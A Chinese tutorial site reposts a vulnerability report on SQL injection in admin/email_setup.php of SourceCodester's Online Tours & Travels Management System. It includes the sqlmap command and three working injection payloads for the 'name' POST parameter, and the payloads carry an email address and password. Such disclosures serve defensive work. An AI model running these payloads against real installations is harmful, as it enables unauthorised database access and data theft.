您现在的位置是：首页 > 技术教程正文

SourceCodester Online Tours & Travels Management System email_setup.php sql injection

admin 阅读： 2024-03-15

后台-插件-广告管理-内容页头部广告（手机）

SourceCodester Online Tours & Travels Management System email_setup.php sql injection

Url: admin/email_setup.php

Abstract:

Line 37 of email_setup.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.

In this case the data is passed to prepare() in email_setup.php at line 37.

在这里插入图片描述

python sqlmap.py -r sql.txt

在这里插入图片描述

sqlmap resumed the following injection point(s) from stored session: --- Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: name=Mayuri K.' RLIKE (SELECT (CASE WHEN (6196=6196) THEN 0x4d6179757269204b2e ELSE 0x28 END)) AND 'uWJN'='uWJN&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update= Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: name=Mayuri K.' AND EXTRACTVALUE(6478,CONCAT(0x5c,0x71706a7671,(SELECT (ELT(6478=6478,1))),0x717a6b6a71)) AND 'UqZk'='UqZk&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update= Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind Payload: name=Mayuri K.' RLIKE SLEEP(5) AND 'beie'='beie&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update= ---

在这里插入图片描述

Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

标签:

声明

1.本站遵循行业规范，任何转载的稿件都会明确标注作者和来源；2.本站的原创文章，请转载时务必注明文章作者和来源，不尊重原创的行为我们将追究责任；3.作者投稿可能会经我们编辑修改或补充。

在线投稿：投稿站长QQ：1888636

后台-插件-广告管理-内容页尾部广告（手机）